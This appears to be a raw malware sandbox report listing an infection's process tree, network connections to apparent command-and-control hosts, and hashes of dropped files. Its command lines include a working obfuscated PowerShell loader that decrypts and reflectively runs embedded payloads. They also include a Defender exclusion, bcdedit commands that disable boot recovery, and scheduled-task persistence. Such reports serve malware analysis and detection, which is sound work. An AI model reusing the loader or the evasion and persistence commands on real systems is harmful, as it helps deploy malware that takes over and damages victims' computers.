"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4804,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5448,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5760,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6012,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sxznnh.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vYb4bUA8Zv1kMxYvRP0sAIjxZQ1BITEGl+5o22oRccc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7mk7YscC2aINMd/eWv3Jag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xocfa=New-Object System.IO.MemoryStream(,$param_var); $bOZJm=New-Object System.IO.MemoryStream; $ufGxK=New-Object System.IO.Compression.GZipStream($Xocfa, [IO.Compression.CompressionMode]::Decompress); $ufGxK.CopyTo($bOZJm); $ufGxK.Dispose(); $Xocfa.Dispose(); $bOZJm.Dispose(); $bOZJm.ToArray();}function execute_function($param_var,$param2_var){ $yYjBH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ftLJu=$yYjBH.EntryPoint; $ftLJu.Invoke($null, $param2_var);}$hWrPo = 'C:\Users\Admin\AppData\Local\Temp\sxznnh.bat';$host.UI.RawUI.WindowTitle = $hWrPo;$pJBjW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hWrPo).Split([Environment]::NewLine);foreach ($TrzXq in $pJBjW) { if ($TrzXq.StartsWith('qwvMZizsyLxauvnWQoBQ')) { $drGJM=$TrzXq.Substring(20); break; }}$payloads_var=[string[]]$drGJM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe
"C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"
C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp" /SL5="$202C8,18247052,1148416,C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"
C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe
"C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe"
C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe
"C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe"
C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\ld.exe
"C:\Users\Admin\AppData\Local\Temp\a\ld.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe
"C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled no
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sxznnh')
C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Users\Admin\AppData\Local\Temp\hqwokv.exe
"C:\Users\Admin\AppData\Local\Temp\hqwokv.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=1840,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\victor.exe
"C:\Users\Admin\AppData\Local\Temp\a\victor.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 736 -ip 736
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 736 -s 232
C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe
"C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\current.exe
"C:\Users\Admin\AppData\Local\Temp\a\current.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\a\host_so.exe
"C:\Users\Admin\AppData\Local\Temp\a\host_so.exe"
C:\Users\Admin\AppData\Local\Temp\wegnhw.exe
"C:\Users\Admin\AppData\Local\Temp\wegnhw.exe"
C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe
"C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\a\inte.exe
"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe
"C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| CN | 124.71.81.174:80 | tcp | |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | 118.194.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | softcatalog.ru | udp |
| RU | 88.212.252.98:443 | softcatalog.ru | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.252.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| MD | 94.103.188.126:80 | 94.103.188.126 | tcp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.174.76.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.188.103.94.in-addr.arpa | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 172.67.188.178:443 | iplogger.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | 29.42.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.188.67.172.in-addr.arpa | udp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 104.91.71.140:443 | bzib.nelreports.net | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 99.86.249.221:80 | sd.p.360safe.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.244.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 221.249.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pepecasas123.net | udp |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 8.8.8.8:53 | 90.205.10.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| DE | 49.13.194.118:53848 | tcp | |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 8.8.8.8:53 | checkforupdate.sytes.net | udp |
| NL | 185.73.125.6:80 | 185.73.125.6 | tcp |
| US | 8.8.8.8:53 | 6.125.73.185.in-addr.arpa | udp |
| CN | 119.91.25.19:8888 | tcp | |
| US | 8.8.8.8:53 | cobusabobus.cam | udp |
| NL | 185.43.220.45:4383 | cobusabobus.cam | tcp |
| US | 8.8.8.8:53 | 45.220.43.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| RU | 91.215.85.135:80 | 91.215.85.135 | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| US | 8.8.8.8:53 | files2.tech | udp |
| SG | 118.194.235.187:50500 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| US | 8.8.8.8:53 | 187.235.194.118.in-addr.arpa | udp |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| DE | 77.91.77.33:80 | 77.91.77.33 | tcp |
| US | 8.8.8.8:53 | 33.77.91.77.in-addr.arpa | udp |
| EE | 45.129.96.86:80 | 45.129.96.86 | tcp |
| US | 8.8.8.8:53 | 86.96.129.45.in-addr.arpa | udp |
| DE | 195.10.205.90:4608 | pepecasas123.net | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | doggie-services.com | udp |
| FR | 5.42.67.23:80 | doggie-services.com | tcp |
| US | 8.8.8.8:53 | 23.67.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fragmentyperspowp.shop | udp |
| US | 104.21.20.181:443 | fragmentyperspowp.shop | tcp |
| US | 8.8.8.8:53 | 181.20.21.104.in-addr.arpa | udp |
| FR | 5.42.67.23:80 | doggie-services.com | tcp |
| US | 8.8.8.8:53 | horsedwollfedrwos.shop | udp |
| US | 172.67.157.243:443 | horsedwollfedrwos.shop | tcp |
| N/A | 10.127.0.1:135 | tcp | |
| RU | 195.2.70.38:30001 | 195.2.70.38 | tcp |
| US | 8.8.8.8:53 | 243.157.67.172.in-addr.arpa | udp |
| RU | 185.231.155.234:17073 | tcp | |
| US | 8.8.8.8:53 | patternapplauderw.shop | udp |
| US | 8.8.8.8:53 | 38.70.2.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.155.231.185.in-addr.arpa | udp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| US | 172.67.174.208:443 | patternapplauderw.shop | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | understanndtytonyguw.shop | udp |
| US | 104.21.22.94:443 | understanndtytonyguw.shop | tcp |
| US | 8.8.8.8:53 | 208.174.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
Files
memory/1332-0-0x0000000000BA0000-0x0000000000BA8000-memory.dmp
memory/1332-1-0x00007FFFE6243000-0x00007FFFE6245000-memory.dmp
memory/1332-2-0x00007FFFE6240000-0x00007FFFE6D01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
| MD5 | e817cc929fbc651c5bdab9e8cca0d9d9 |
| SHA1 | 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f |
| SHA256 | 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282 |
| SHA512 | a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f |
memory/3340-14-0x0000000074F4E000-0x0000000074F4F000-memory.dmp
memory/3340-15-0x0000000000560000-0x00000000007A0000-memory.dmp
memory/3340-16-0x0000000074F40000-0x00000000756F0000-memory.dmp
memory/3340-17-0x0000000005280000-0x000000000549C000-memory.dmp
memory/3340-18-0x00000000065D0000-0x00000000067EE000-memory.dmp
memory/3340-19-0x0000000006DC0000-0x0000000007364000-memory.dmp
memory/3340-20-0x0000000006910000-0x00000000069A2000-memory.dmp
memory/3340-21-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-32-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-34-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-48-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-63-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-64-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-76-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-74-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-72-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-70-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-68-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-66-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-60-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-58-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-54-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-50-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-56-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-52-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-46-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-44-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-40-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-38-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-37-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-42-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-30-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-28-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-26-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-24-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-22-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-78-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-84-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-82-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-81-0x00000000065D0000-0x00000000067E8000-memory.dmp
memory/3340-4907-0x0000000074F40000-0x00000000756F0000-memory.dmp
memory/3340-4909-0x0000000006A90000-0x0000000006ADC000-memory.dmp
memory/3340-4908-0x0000000006A30000-0x0000000006A88000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
| MD5 | b11913361b2d4c43c00c1969184050a8 |
| SHA1 | 8358fa3426e4136e0873a32f49f5f367770bad0a |
| SHA256 | de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57 |
| SHA512 | 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026 |
memory/4036-4921-0x0000000000E10000-0x0000000000E11000-memory.dmp
memory/5632-4926-0x0000000000400000-0x000000000087C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
| MD5 | 66a5a529386533e25316942993772042 |
| SHA1 | 053d0d7f4cb6e3952e849f02bbfbdb4d39021146 |
| SHA256 | 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94 |
| SHA512 | 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a |
C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
| MD5 | 0c2564813f2b9fc088cfb6938214d3cb |
| SHA1 | cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0 |
| SHA256 | 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2 |
| SHA512 | 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1 |
C:\Users\Admin\AppData\Local\Temp\nsh6F12.tmp\UAC.dll
| MD5 | adb29e6b186daa765dc750128649b63d |
| SHA1 | 160cbdc4cb0ac2c142d361df138c537aa7e708c9 |
| SHA256 | 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08 |
| SHA512 | b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada |
C:\Users\Admin\AppData\Local\Temp\nsh6F12.tmp\nsExec.dll
| MD5 | 132e6153717a7f9710dcea4536f364cd |
| SHA1 | e39bc82c7602e6dd0797115c2bd12e872a5fb2ab |
| SHA256 | d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2 |
| SHA512 | 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1 |
C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat
| MD5 | f6423b02fa9b2de5b162826b26c0dc56 |
